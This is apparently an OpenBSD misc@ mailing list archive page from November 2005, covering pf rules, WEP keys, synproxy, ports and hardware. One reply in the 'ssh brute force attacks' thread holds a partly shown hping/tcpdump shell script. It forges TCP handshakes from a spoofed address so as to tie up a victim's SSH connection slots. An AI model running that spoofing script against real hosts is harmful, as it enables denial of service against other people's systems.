ahc1 at pci0 dev 9 function 0 "Adaptec AHA-29160 U160" rev 0x02: apic 2 int 17 (irq 11)
scsibus0 at ahc1: 16 targets
ppb1 at pci0 dev 16 function 0 "AMD 768 PCI-PCI" rev 0x05
pci2 at ppb1 bus 2
ohci0 at pci2 dev 0 function 0 "AMD 768 USB" rev 0x07: apic 2 int 19 (irq 5), version 1.0, legacy support
usb0 at ohci0: USB revision 1.0
uhub0 at usb0
uhub0: AMD OHCI root hub, class 9/0, rev 1.00/1.00, addr 1
uhub0: 4 ports with 4 removable, self powered
pciide1 at pci2 dev 4 function 0 "Promise PDC20269" rev 0x02: DMA, channel 0 configured to native-PCI, channel 1 configured to native-PCI
pciide1: using apic 2 int 16 (irq 5) for native-PCI interrupt
wd1 at pciide1 channel 0 drive 0:
wd1: 16-sector PIO, LBA48, 239372MB, 490234752 sectors
wd2 at pciide1 channel 0 drive 1:
wd2: 16-sector PIO, LBA48, 238475MB, 488397168 sectors
wd1(pciide1:0:0): using PIO mode 4, Ultra-DMA mode 6
wd2(pciide1:0:1): using PIO mode 4, Ultra-DMA mode 5
wd3 at pciide1 channel 1 drive 0:
wd3: 16-sector PIO, LBA48, 286168MB, 586072368 sectors
wd3(pciide1:1:0): using PIO mode 4, Ultra-DMA mode 5
em0 at pci2 dev 6 function 0 "Intel PRO/1000MT (82540EM)" rev 0x02: apic 2 int 18 (irq 11), address: 00:0e:0c:06:b6:ea
fxp0 at pci2 dev 9 function 0 "Intel 82559ER" rev 0x09, i82559S: apic 2 int 17 (irq 11), addres

Re: ssh brute force attacks

2005-11-13 Thread Joachim Schipper
On Sat, Nov 12, 2005 at 10:16:05AM -0500, Melameth, Daniel D. wrote:
> Joachim Schipper wrote:


> Perhaps I missed something in this thread, but what are you talking
> about?  This is why you run SSH and not telnet--so that traffic sniffing
> doesn't reveal the contents of the packets.  Also, quality manageable
> switches can (and should) be configured so that overloading their MAC
> table is pretty much impossible.

This is an attack against TCP, not SSH. TCP is not encrypted (usually -
IPSec or somesuch, with the proper settings, could make this impossible)
- all that's required is some sequence numbers.

And yes, a really good switch configured by someone who really knows
what he's doing will protect you from this. Fail either, and there's
likely to be a way around it - and if both conditions are satisfied,
chances are you don't need to ask about ssh probes on some mailing list.
;-)

> > Methinks a combination of sniffing the return traffic (SYN/ACK) and
> > forging the response is enough (this is assuming the spoofed host does
> > not return a RST for nonsense SYN/ACKs - I'm fairly certain that
> > there's a way around that too, most likely just racing the gateway,
> > but that would complicate matters unnecessarily).
> 
> Again I'm not certain what you are getting at here.  Perhaps it's too
> early and I'm missing something, but this is another reason why one
> would run OpenBSD as the TCP stack does a lot of bounds checking and
> randomization which makes these attacks more difficult.  In addition to
> this, SSH performs cryptographic session integrity.  As for the gateway,
> it really has little to do with an SSH session between two hosts.

Yes, you are right that doing a blind attack of this sort would be
difficult due to OpenBSD's randomizations. That's why I propose not
doing a blind attack, i.e. sniffing the connection.

And you are right about the gateway, of course. Oops.

> > I'm thinking of a couple of hosts, attached to a hub (or 'hubbable'
> > switch).
> > 
> > If this attack really doesn't work, well, I'll be happy to learn
> > something new and/or Read Some More FMP... but in the meanwhile, I can
> > live with the log entries.
> > 
> > (Of course, the real Braindead Error above was me seemingly thinking
> > that dropping the default gateway would help. Instead, drop some
> > other, more interesting host.)

Consider something like the following script. It's tested a little, and
appears to work on my two OpenBSD 3.8 machines, running IPv4 on a hub.
(Sadly, lack of a suitable third machine makes testing a little
awkward.)

It requires security/hping. It also depends on the machine being spoofed
not returning RSTs for nonsense (SYN/)ACKs, and the machine being used
being able to sniff the traffic between the alleged sender and the
victim.  Simply returning ACKs is not sufficient protection; a better -
C - implementation could try to outrun the ACKs. I haven't tested this,
but I believe this would allow essentially the same thing to happen.

(Note that the script does not spoof arp, so a nonexistent host on the
local network isn't going to be spoofable.)

It opens a TCP connection from $SOURCE_IP:$SOURCE_PORT to
$VICTIM_IP:$VICTIM_PORT. It does not close this, which means the
connection stays open until timeout. Given a sufficiently low limit on
connections, it can block $VICTIM_IP from accessing the specified
service.

Again, note that this is an implementation problem - a well-optimized,
multithreaded or forked implementation could block quite a few hosts in
a couple of minutes.

(Please note that the script is not wrapped. Sorry!)

** START SCRIPT **
#!/bin/sh
SOURCE_IP=192.168.0.2
# Pseudo-random
SOURCE_PORT=$(( $$ + 2048 ))
VICTIM_IP=192.168.0.3
VICTIM_PORT=22

TMP=`mktemp /tmp/killer.tmp.` || exit 1
DEBUG=`mktemp /tmp/killer.debug.` || exit 1

tcpdump -Sw $TMP host $VICTIM_IP and port $VICTIM_PORT &

TCPDUMP_PID=$!

MYSEQ=$$

# Allow tcpdump time to start
sleep 3

# SYN
hping -Ss $SOURCE_PORT -a $SOURCE_IP -p $VICTIM_PORT -M $MYSEQ -c 1 $VICTIM_IP >$DEBUG 2>&1

# Wait for tcpdump, parse SYN/ACK
sleep 2
# 18:45:07.977176 192.168.0.5.37 > 192.168.0.2.22171: S [tcp sum ok] 2083463336:2083463336(0) ack 1914314338 win 16384  (DF) (ttl 64, id 37179, len 64)
PARSEME=`tcpdump -vvvnr $TMP | tee out2 | sed -ne "s/.* $VICTIM_IP\.$VICTIM_PORT > $SOURCE_IP\.$SOURCE_PORT: S \[tcp sum ok\] \([0-9]*\):\1(0) ack \([0-9]*\) .*/\1 \2/p"`

if [ "x$PARSEME" = "x" ]; then
    echo "Parsing SYN/ACK failed. Sorry" >&2
    exit 1
fi

RSEQ=`echo $PARSEME | awk '{print $1}'`
RSEQ=$(( $RSEQ + 1 ))
MYSEQ=`echo $PARSEME | awk '{print $2}'`

# Send ACK
echo "ACKing, now expecting $RSEQ"
hping -As $SOURCE_PORT -a $SOURCE_IP -p $VICTIM_PORT -M $MYSEQ -L $RSEQ -c 1 $VICTIM_IP >>$DEBUG 2>&1
MYSEQ=$(( $MYSEQ + 1 ))

# Wait for tcpdump, parse
# Give tcpdump time to finish
sleep 1
kill $TCPDUMP_PID
wait

# Debugging mode
#echo $TMP
#echo $DEBUG
rm -f $TMP $DEBUG

# Sample TCP connection - no

Re: pf keep state on 3.8

2005-11-13 Thread Jim Razmus
* Jimmy Scott <[EMAIL PROTECTED]> [051113 12:35]:
> Hi misc@,
> 
> I finally had some time to rearrange my network, and split it into 3
> parts: LAN, DMZ, WAN.
> 
> Basically, the LAN (172.20) may not access the DMZ (172.16), but host
> 172.20.1.10 can. The DMZ may not access the LAN, and both can go to the
> WAN.
> 
> But for some reason, when I create state from 172.20.1.10 to 172.16.x.x;
> the packet coming back gets blocked which should not happen because the
> state would be checked first and the state really is created?!
> 
> I tried setting 'set state-policy floating' explicitly, but no advance.
> Someone who knows what the problem is here? I had a ruleset with a bunch
> of 'quick' rules before instead of this, but had the same problem.
> 
> tcpdump on pflog:
> 18:12:16.483526 rule 12/(match) pass in on sis2: 172.20.1.10.57132 >
> 172.16.0.5.ssh: [|tcp]
> 18:12:16.483960 rule 21/(match) block in on sis1: 172.16.0.5.ssh >
> 172.20.1.10.57132: [|tcp]
> 
> 
> grep on state:
> # pfctl -s state|grep 172.16.0.5
> all tcp 172.16.0.5:22 <- 172.20.1.10:57132   CLOSED:SYN_SENT
> 
> 
> kernel:
> OpenBSD 3.8 (GENERIC) #138: Sat Sep 10 15:41:37 MDT 2005
> [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
> 
> rules:
> scrub in all no-df fragment reassemble
> scrub out all no-df random-id fragment reassemble
> block drop in log all
> block drop log inet6 all
> block drop in log quick on sis0 from any to (sis0:broadcast)
> block drop in log quick on sis0 from  to any
> pass log quick on lo0 inet from 127.0.0.0/8 to any
> pass log quick on lo0 inet6 from ::1 to any
> pass in log on sis2 inet proto tcp from 172.20.0.0/16 to any modulate state
> pass in log on sis2 inet proto udp from 172.20.0.0/16 to any keep state
> pass in log on sis2 inet proto icmp from 172.20.0.0/16 to any keep state
> block drop in log on sis2 inet proto tcp from any to 172.16.0.0/16
> block drop in log on sis2 inet proto udp from any to 172.16.0.0/16
> block drop in log on sis2 inet proto icmp from any to 172.16.0.0/16
> pass in log on sis2 inet proto tcp from 172.20.1.10 to 172.16.0.0/16 keep
> state
> pass in log on sis2 inet proto udp from 172.20.1.10 to 172.16.0.0/16 keep
> state
> pass in log on sis2 inet proto icmp from 172.20.1.10 to 172.16.0.0/16 keep
> state
> pass out log on sis2 inet proto tcp from 172.20.0.1 to 172.20.0.0/16 keep
> state
> pass out log on sis2 inet proto udp from 172.20.0.1 to 172.20.0.0/16 keep
> state
> pass out log on sis2 inet proto icmp from 172.20.0.1 to 172.20.0.0/16 keep
> state
> pass in log on sis1 inet proto tcp from 172.16.0.0/16 to any modulate state
> pass in log on sis1 inet proto udp from 172.16.0.0/16 to any keep state
> pass in log on sis1 inet proto icmp from 172.16.0.0/16 to any keep state
> block drop in log on sis1 inet proto tcp from any to 172.20.0.0/16
> block drop in log on sis1 inet proto udp from any to 172.20.0.0/16
> block drop in log on sis1 inet proto icmp from any to 172.20.0.0/16
> pass out log on sis1 inet proto tcp from 172.16.0.1 to 172.16.0.0/16 keep
> state
> pass out log on sis1 inet proto udp from 172.16.0.1 to 172.16.0.0/16 keep
> state
> pass out log on sis1 inet proto icmp from 172.16.0.1 to 172.16.0.0/16 keep
> state
> [sis0 rules snipped]
> 
> Kind regards,
> Jimmy Scott
> 
> --
> The Four Horsemen of the Apocalypse: Death, Famine, War, and SNMP
> 
> [demime 1.01d removed an attachment of type application/pgp-signature]
> 

I think you might have the concept of "in" and "out" rules confused.
Visualize yourself sitting in the computer between the three interfaces.
From that perspective, "in" rules mean a packet coming from a remote
host to you through one of those interfaces.  Conversely "out" rules
mean a packet leaving from the local machine to some remote host.

Give something like this a whirl for starters.  Caution, I have not
tested these!  You also likely need to allow packets from the Internet
into your DMZ.

# pf.conf
scrub in all no-df fragment reassemble
scrub out all no-df random-id fragment reassemble
block drop in log all
block drop log inet6 all
block drop in log quick on sis0 from any to (sis0:broadcast)
block drop in log quick on sis0 from  to any
pass log quick on lo0 inet from 127.0.0.0/8 to any
pass log quick on lo0 inet6 from ::1 to any

# LAN interface
pass in on sis2 inet proto tcp \
  from 172.20.0.0/16 to !172.16.0.0/16 modulate state
pass in on sis2 inet proto udp \
  from 172.20.0.0/16 to !172.16.0.0/16 keep state
pass in on sis2 inet proto icmp \
  from 172.20.0.0/16 to !172.16.0.0/16 keep state
pass in on sis2 inet proto tcp \
  from 172.20.1.10 to any modulate state
pass in on sis2 inet proto udp \
  from 172.20.1.10 to any keep state
pass in on sis2 inet proto icmp \
  from 172.20.1.10 to any keep state
block out on sis2 all # nothing gets out unless state or rule allows it
# not sure why you want these rules here, what's the firewall doing?
pass out on sis2 inet proto tcp \
  from 172.20.0.1 to 172.20.0.0/16 keep state
pass ou
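
The in/out perspective Jim describes, as an added example that is neither Jim's nor Jimmy's ruleset: a complete three-interface policy for the LAN/DMZ/WAN layout in this thread, written in the explicit "keep state" syntax of the 3.8-era pf.conf(5). The interface names sis0/sis1/sis2, the 172.20.0.0/16 and 172.16.0.0/16 networks and the 172.20.1.10 host are taken from the thread; the macro names, the ports the DMZ publishes to the Internet and the firewall's own outbound rules are assumptions.

```pf
# Added example, not a ruleset from the thread. Interface and address
# values are the thread's; macro names and the port list are assumed.
lan_if  = "sis2"
dmz_if  = "sis1"
wan_if  = "sis0"
lan_net = "172.20.0.0/16"
dmz_net = "172.16.0.0/16"
admin   = "172.20.1.10"
dmz_services = "{ 25, 80 }"     # assumed: what the DMZ offers to the Internet

scrub in all no-df fragment reassemble

# Default deny in both directions. Every pass rule below is an exception,
# and without "quick" the last matching rule wins.
block drop in log all
block drop out log all

pass quick on lo0 all

# "in" rules judge a packet as it ENTERS the firewall on an interface.
# A forwarded packet is filtered once, on the interface it arrives on;
# the state it creates is floating (the default state-policy), so the
# same packet leaving on another interface, and the reply coming back
# in on that other interface, match the state and never reach the
# "out" or "in" rules again.

# LAN: may go anywhere except the DMZ ...
pass in on $lan_if inet proto { tcp, udp, icmp } \
    from $lan_net to !$dmz_net keep state
# ... but the admin host may reach the DMZ as well (later rule wins)
pass in on $lan_if inet proto { tcp, udp, icmp } \
    from $admin to $dmz_net keep state

# DMZ: may go anywhere except the LAN
pass in on $dmz_if inet proto { tcp, udp, icmp } \
    from $dmz_net to !$lan_net keep state

# WAN: only the published DMZ services; pf completes the TCP handshake
# itself before the server sees the connection
pass in on $wan_if inet proto tcp \
    from any to $dmz_net port $dmz_services flags S/SA synproxy state

# With floating states, "out" rules are reached only by packets the
# firewall itself originates (resolver queries, ntpd, package fetches):
# here the firewall is the source, not a hop, so no earlier state exists.
pass out on $wan_if inet proto { tcp, udp } from ($wan_if) to any keep state
pass out on $wan_if inet proto icmp from ($wan_if) to any keep state
```

Load it with `pfctl -nf /etc/pf.conf` first (parse only) and then `pfctl -f /etc/pf.conf`; after a test connection from 172.20.1.10, `pfctl -s state` should show one entry for it, and a reply that is still logged by the default "block in" on the DMZ interface means the reply did not match that state, which is the symptom Jimmy's pflog shows.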

Re: Building a bootable CF w/ a RAM-disk kernel

2005-11-13 Thread J Moore
On Sun, Nov 13, 2005 at 07:52:04PM +1100, the unit calling itself Damien Miller 
wrote:
> On Sat, 12 Nov 2005 21:54:42 -0600
> J Moore <[EMAIL PROTECTED]> wrote:
> 
> > The readme file in flashboot contains an overview of building the 
> > ram-disk kernel. What it doesn't explain is how to install the kernel on 
> > the CF, or prepare the CF for booting the kernel.
> 
> There are some extra instructions in the latest version of the README:
> http://cvsweb.mindrot.org/index.cgi/~checkout~/flashboot/README?rev=HEAD
> 
> These start by recommending that you read the boot(8) and 
> installboot(8) manpages.

Thanks! In the meantime I turned this up (it's REALLY good)

http://master.iu.hio.no/wiki/index.php/OpenBSD_on_net4801

Jay



(3.8) pf smtp synproxy

2005-11-13 Thread J.D. Bronson
I have noticed an odd thing. I think someone else reported this 
awhile back...but using pf with synproxy like this:


pass in quick on $EXT_INT proto tcp from any to $SERVERS port 25 
flags S/SA synproxy state


..causes issues. What I see are tons of rejects in pflog all relating 
to yahoo email servers (big surprise here).


Now, if I change 'synproxy' to 'modulate' - things work fine as expected.

So..I was wondering if anyone has a workaround on how to deal 
with 'yahoo'. So far, from installing pf - 'yahoo' is the only 
*legit* system I have seen that is not working with synproxy.


I enjoy this feature however, as I am seeing a lot of cable modem IPs 
that are failing with synproxy...so I would like to continue to use it.


Yahoo seems to use smtp servers all over the map...they don't just 
have 1 or 2 netblocks that I could permit via modulate state ahead of 
synproxy state rules.


Any thoughts on this? - I don't consider it a bug at all, but was 
wondering if/how anyone is dealing with this.


I think this is a decent feature to have and use - if I can find a workaround.

Perhaps a table or something, but I may not be able to locate all of 
the yahoo mail server IPs.


Thanks in advance for any tips.

-JD
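
The table-based exemption J.D. floats at the end, as an added example that is not his ruleset: senders that cannot complete the proxied handshake are listed in a table and matched by an earlier "quick" rule with modulate state, so only the remaining senders reach the synproxy rule. The $EXT_INT and $SERVERS macro names come from his post; the interface, server address, table contents and file path are placeholders.

```pf
# Added example, not J.D.'s ruleset. $EXT_INT and $SERVERS are his macro
# names; interface, server address, table contents and file path are
# assumed placeholders.
EXT_INT = "fxp0"
SERVERS = "{ 192.0.2.25 }"

# Senders whose handshake does not survive synproxy. "persist" keeps the
# table in the kernel even when no rule references it, and the file lets
# the list survive a ruleset reload. Entries can also be added at runtime
# with "pfctl -t synproxy_exempt -T add <addr>", but that changes only the
# in-kernel table: the file is read at load time, so append there as well.
table <synproxy_exempt> persist file "/etc/pf.synproxy_exempt"

# Exempt senders still get a stateful, sequence-modulated connection;
# "quick" ends evaluation here so the synproxy rule below never sees them.
pass in quick on $EXT_INT proto tcp from <synproxy_exempt> to $SERVERS port 25 \
    flags S/SA modulate state

# Everyone else must finish the three-way handshake with pf before the MTA
# ever sees a connection.
pass in quick on $EXT_INT proto tcp from any to $SERVERS port 25 \
    flags S/SA synproxy state
```

Candidates for the table come from the same pflog J.D. is reading: `tcpdump -n -e -ttt -r /var/log/pflog port 25` lists the blocked sources, and adding the netblock a legitimate sender appears from is cheaper than trying to enumerate every mail server ahead of time. One caveat worth checking before blaming the remote side: synproxy only works when pf sees both directions of the connection, so an asymmetric path produces the same "never completes" signature in pflog as a sender that genuinely dislikes the proxied handshake.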



updating ports

2005-11-13 Thread Thanos Tsouanas
Hello.

I'm following current, and I usually remove and reinstall all the
ports that i need since they are not that many.  'make update' does a
good job updating a package when there is a newer version in my ports
tree, but:

The out-of-date output displays some ports that need 'updating' even
if there is no newer version for them, but just for some of their
dependencies.  Is there an automated process I could follow for them
instead of the traditional and stably-working "remove all and
reinstall all" method?

Thanks.

-- 
Thanos Tsouanas  .: My Music: http://www.thanostsouanas.com/
http://thanos.sians.org/ .: Sians Music: http://www.sians.org/



Re: 3c985b and optiplex gx520

2005-11-13 Thread Scott Tracey - TPSX
What is the output of this command?

cat /etc/hostname.ti0

It should be something like:

inet addr netmask broadcast_addr options


Do you have a DHCP server on the network?

It seems odd that you have no "blinking lights". I am also not aware of any
compatibility issues with your particular card.  Especially since the
boot-up looks clean:

> > > ti0 at pci4 dev 0 function 0 "3Com 3c985" rev 0x01: irq 11 address
> > > 00:60:08:f7:17:c4
> > > ti1 at pci4 dev 2 function 0 "3Com 3c985" rev 0x01: irq 3 address
> > > 00:60:08:f7:19:61

Sorry for the delayed response. I hope you have it working already.

- Original Message - 
From: "Javier Martinez" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; 
Sent: Thursday, November 10, 2005 1:39 PM
Subject: Re: 3c985b and optiplex gx520


> I disconnected all the interfaces and after connected only one.
>
> I'm sure that the cables are working. I tried with these options in the
> hostname.ti0, each time I configured with one of these and reboot the
> computer:
>
> media 1000baseSX
> media 1000baseSX mediaopt full-duplex
> media autoselect
>
> And my ifconfig -a results:
>
> lo0: flags=8049 mtu 33224
> groups: lo
> inet 127.0.0.1 netmask 0xff00
> inet6 ::1 prefixlen 128
> inet6 fe80::1%lo0 prefixlen 64 scopeid 0x5
> ti0: flags=8802 mtu 1500
> lladdr 00:60:08:f7:19:61
> media: Ethernet 1000baseSX (autoselect)
> status: no carrier
> pflog0: flags=0<> mtu 33224
> pfsync0: flags=0<> mtu 1348
> enc0: flags=0<> mtu 1536
>
>
> Any idea???
> Do you know about a problem with these hardware bond??
>
>
> On Wed, Nov 09, 2005 at 08:24:58PM -0500, [EMAIL PROTECTED] wrote:
> > Start by reviewing http://www.openbsd.org/faq/faq6.html#Intro
> >
> > Focus on the physical aspects of the connection before the PC/OS
> > configuration stuff.
> >
> > Disconnect one of the nic card cables from the switch. Try to get one card
> > up before the other.
> >
> > Do you know if the cables you are using work on another PC? Verify that
> > before moving on.
> >
> > What does the following command reveal?
> >
> > ifconfig -a
> >
> > What do these commands reveal?
> >
> > cat /etc/hostname.ti0
> > cat /etc/hostname.ti1
> >
> >
> > > Hi,
> > >
> > > I have a problem with a dell optiplex gx520 and a 3com985 gigabit nic.
> > > I installed OpenBSD 3.8 and everything is ok, I can see the nic in the
> > > ifconfig, but when I connected it to the switch I didn't get the link, the
> > > leds in both sides are turn off, I can't get the link light.
> > >
> > > Do yo have any idea what can I do??
> > >
> > > I sent you the dmesg output. Thanks a lot
> > >
> > > OpenBSD 3.8 (GENERIC) #138: Sat Sep 10 15:41:37 MDT 2005
> > > [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
> > > cpu0: Intel(R) Pentium(R) 4 CPU 2.80GHz ("GenuineIntel" 686-class) 2.80 GHz
> > > cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,CNXT-ID
> > > real mem  = 526520320 (514180K)
> > > avail mem = 473497600 (462400K)
> > > using 4278 buffers containing 26427392 bytes (25808K) of memory
> > > mainbus0 (root)
> > > bios0 at mainbus0: AT/286+(00) BIOS, date 08/05/05, BIOS32 rev. 0 @ 0xffe90
> > > apm0 at bios0: Power Management spec V1.2
> > > apm0: AC on, battery charge unknown
> > > apm0: flags 30102 dobusy 0 doidle 1
> > > pcibios0 at bios0: rev 2.1 @ 0xf/0x1
> > > pcibios0: PCI IRQ Routing Table rev 1.0 @ 0xfed10/240 (13 entries)
> > > pcibios0: PCI Interrupt Router at 000:31:0 ("Intel 82801GB LPC" rev 0x00)
> > > pcibios0: PCI bus #4 is the last bus
> > > bios0: ROM list: 0xc/0xa800! 0xca800/0x1800
> > > cpu0 at mainbus0
> > > pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
> > > pchb0 at pci0 dev 0 function 0 "Intel 82945GP" rev 0x02
> > > ppb0 at pci0 dev 1 function 0 "Intel 82945GP PCIE" rev 0x02
> > > pci1 at ppb0 bus 1
> > > vga1 at pci0 dev 2 function 0 vendor "Intel", unknown product 0x2772 rev 0x02: aperture at 0xfeb0, size 0x800
> > > wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
> > > wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
> > > vendor "Intel", unknown product 0x2776 (class display subclass miscellaneous, rev 0x02) at pci0 dev 2 function 1 not configured
> > > ppb1 at pci0 dev 28 function 0 "Intel 82801GB PCIE" rev 0x01
> > > pci2 at ppb1 bus 2
> > > bge0 at pci2 dev 0 function 0 "Broadcom BCM5751" rev 0x01, BCM5750 A1
> > > (0x4001): irq 11 address 00:12:3f:52:6d:ca
> > > brgphy0 at bge0 phy 1: BCM5750 10/100/1000baseT PHY, rev. 0
> > > ppb2 at pci0 dev 28 function 1 "Intel 82801GB PCIE" rev 0x01
> > > pci3 at ppb2 bus 3
> > > uhci0 at pci0 dev 29 function 0 "Intel 82801GB USB" rev 0x01: irq 9
> > > usb0 at uhci0: USB revision 1.0
> > > uhub0 at usb0
> > > uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1
> > > uhub0: 2 ports with 2 removable, self powered
> > > uhci1 at pci

Re: WLAN (Linksys WPC111) + WEP

2005-11-13 Thread Darrin Chandler

Nikolaus Hiebaum wrote:

> Darren wrote:
>
> > wi(4) says: wi is capable of using both 40-bit (5 characters or 10
> > hexadecimal digits) or 104-bit (13 characters or 26 hexadecimal digits)
> > keys.
> >
> > So you'll need either 0xBACE8A21EA as your *hex* key (for 40 bit), or
> > something else entirely is going with your keys.
>
> Thank you! :) It works now! ;-) I thought the '0x' was only to be used for a
> hexadecimal translation.
>
> Do you know what the second type as mentioned by wi means resp. how the syntax
> would be
>
> [...] or a set of keys of the form ``n:k1,k2,k3,k4'', where `n' specifies which
> of the keys will be used for transmitted packets, and the four keys, ``k1''
> through ``k4'', are configured as WEP keys.  If a set of keys is specified,
> a comma (`,') [...]
>
> n:BACE8A21EA ? Coz that didn't work.

Really, it's a HEX KEY. First, "BACE8A21EA" should be "0xBACE8A21EA". 
Second, it should be "1:0xBACE8A21EA" to specify the first key for 
transmitting. Third, if you only have one key then why use the multikey 
syntax at all? You can just stick with "0xBACE8A21EA" by itself.


--
Darrin Chandler
[EMAIL PROTECTED]
http://www.stilyagin.com/



pf keep state on 3.8

2005-11-13 Thread Jimmy Scott
Hi misc@,

I finally had some time to rearrange my network, and split it into 3
parts: LAN, DMZ, WAN.

Basically, the LAN (172.20) may not access the DMZ (172.16), but host
172.20.1.10 can. The DMZ may not access the LAN, and both can go to the
WAN.

But for some reason, when I create state from 172.20.1.10 to 172.16.x.x,
the packet coming back gets blocked, which should not happen because the
state would be checked first, and the state really is created?!

I tried setting 'set state-policy floating' explicitly, but no advance.
Someone who knows what the problem is here? I had a ruleset with a bunch
of 'quick' rules before instead of this, but had the same problem.

tcpdump on pflog:
18:12:16.483526 rule 12/(match) pass in on sis2: 172.20.1.10.57132 >
172.16.0.5.ssh: [|tcp]
18:12:16.483960 rule 21/(match) block in on sis1: 172.16.0.5.ssh >
172.20.1.10.57132: [|tcp]


grep on state:
# pfctl -s state|grep 172.16.0.5
all tcp 172.16.0.5:22 <- 172.20.1.10:57132   CLOSED:SYN_SENT


kernel:
OpenBSD 3.8 (GENERIC) #138: Sat Sep 10 15:41:37 MDT 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC

rules:
scrub in all no-df fragment reassemble
scrub out all no-df random-id fragment reassemble
block drop in log all
block drop log inet6 all
block drop in log quick on sis0 from any to (sis0:broadcast)
block drop in log quick on sis0 from  to any
pass log quick on lo0 inet from 127.0.0.0/8 to any
pass log quick on lo0 inet6 from ::1 to any
pass in log on sis2 inet proto tcp from 172.20.0.0/16 to any modulate state
pass in log on sis2 inet proto udp from 172.20.0.0/16 to any keep state
pass in log on sis2 inet proto icmp from 172.20.0.0/16 to any keep state
block drop in log on sis2 inet proto tcp from any to 172.16.0.0/16
block drop in log on sis2 inet proto udp from any to 172.16.0.0/16
block drop in log on sis2 inet proto icmp from any to 172.16.0.0/16
pass in log on sis2 inet proto tcp from 172.20.1.10 to 172.16.0.0/16 keep
state
pass in log on sis2 inet proto udp from 172.20.1.10 to 172.16.0.0/16 keep
state
pass in log on sis2 inet proto icmp from 172.20.1.10 to 172.16.0.0/16 keep
state
pass out log on sis2 inet proto tcp from 172.20.0.1 to 172.20.0.0/16 keep
state
pass out log on sis2 inet proto udp from 172.20.0.1 to 172.20.0.0/16 keep
state
pass out log on sis2 inet proto icmp from 172.20.0.1 to 172.20.0.0/16 keep
state
pass in log on sis1 inet proto tcp from 172.16.0.0/16 to any modulate state
pass in log on sis1 inet proto udp from 172.16.0.0/16 to any keep state
pass in log on sis1 inet proto icmp from 172.16.0.0/16 to any keep state
block drop in log on sis1 inet proto tcp from any to 172.20.0.0/16
block drop in log on sis1 inet proto udp from any to 172.20.0.0/16
block drop in log on sis1 inet proto icmp from any to 172.20.0.0/16
pass out log on sis1 inet proto tcp from 172.16.0.1 to 172.16.0.0/16 keep
state
pass out log on sis1 inet proto udp from 172.16.0.1 to 172.16.0.0/16 keep
state
pass out log on sis1 inet proto icmp from 172.16.0.1 to 172.16.0.0/16 keep
state
[sis0 rules snipped]

Kind regards,
Jimmy Scott

--
The Four Horsemen of the Apocalypse: Death, Famine, War, and SNMP

[demime 1.01d removed an attachment of type application/pgp-signature]



Re: WLAN (Linksys WPC111) + WEP

2005-11-13 Thread Nikolaus Hiebaum
* Nikolaus Hiebaum wrote on Nov 13, 2005 [17:35, +0100] :

> Thank you! :) It works now! ;-) I thought the '0x' was only to be used for a
> hexadecimal translation.

One last question: With which application can I measure the strength of the
signal or if there are other WLAN around, preferably a GUI.

-- 
Beste Grüße / Best regards,
Nikolaus Hiebaum



Re: WLAN (Linksys WPC111) + WEP

2005-11-13 Thread Nikolaus Hiebaum
Darren wrote:

> wi(4) says: wi is capable of using both 40-bit (5 characters or 10
> hexadecimal digits) or 104-bit (13 characters or 26 hexadecimal digits)
> keys.
>
> So you'll need either 0xBACE8A21EA as your *hex* key (for 40 bit), or
> something else entirely is going with your keys.

Thank you! :) It works now! ;-) I thought the '0x' was only to be used for a
hexadecimal translation.

Do you know what the second type as mentioned by wi means resp. how the syntax
would be

[...] or a set of keys of the form ``n:k1,k2,k3,k4'', where `n' specifies which
of the keys will be used for transmitted packets, and the four keys, ``k1''
through ``k4'', are configured as WEP keys.  If a set of keys is specified,
a comma (`,') [...]

n:BACE8A21EA ? Coz that didn't work.

-- 
Beste Grüße / Best regards,
Nikolaus Hiebaum



Re: WLAN (Linksys WPC111) + WEP

2005-11-13 Thread Darrin Chandler

Nikolaus Hiebaum wrote:

> * Darrin Chandler wrote on Nov 13, 2005 [08:16, -0700] :
>
> > > ifconfig wi0 192.168.0.21 255.255.255.0 nwid scyld nwkey BACE8A21EA up
> >
> > Not sure if it was just a typo in your email, but I think you want the
> > nwkey as hex, ... nwid 0xBACE8A21EA ...
>
> * Darrin Chandler wrote on Nov 13, 2005 [08:19, -0700] :
>
> > Typo in *my* last email. You want nwkey as hex, not nwid!
>
> O.K., so I translated the whole BACE8A21EA into 0x42414345384132314541 and gave
> it a try.
>
> Same thing as before. ifconfig, netstat and the AP tell me, I am all connected
> just fine, but I cannot ping an IP (not even the router).

wi(4) says: wi is capable of using both 40-bit (5 characters or 10
hexadecimal digits) or 104-bit (13 characters or 26 hexadecimal digits)
keys.

So you'll need either 0xBACE8A21EA as your *hex* key (for 40 bit), or
something else entirely is going with your keys.


--
Darrin Chandler
[EMAIL PROTECTED]
http://www.stilyagin.com/



quagga woes

2005-11-13 Thread brtw2003
hi list,

i'm quite curious when the port: net/quagga will be fixed, because
also with the latest cvs-snapshot from the quagga site, i'm still
not able to compile it :-(

details:
OpenBSD 3.7 (i386)

output from the port tree:
--SNIP---
Making all in
zebra
source='/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c'
object='kernel_socket.o' libtool=no  depfile='.deps/kernel_socket.Po'
tmpdepfile='.deps/kernel_socket.TPo'  depmode=gcc3 /bin/sh
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/depcomp  cc
-DHAVE_CONFIG_H -DSYSCONFDIR=\"/etc/zebra/\" -DMULTIPATH_NUM=1 -I.
-I/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra -I.. -I..
-I/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4
-I/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/lib -O2 -pipe -c
`test -f
'/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c'
|| echo
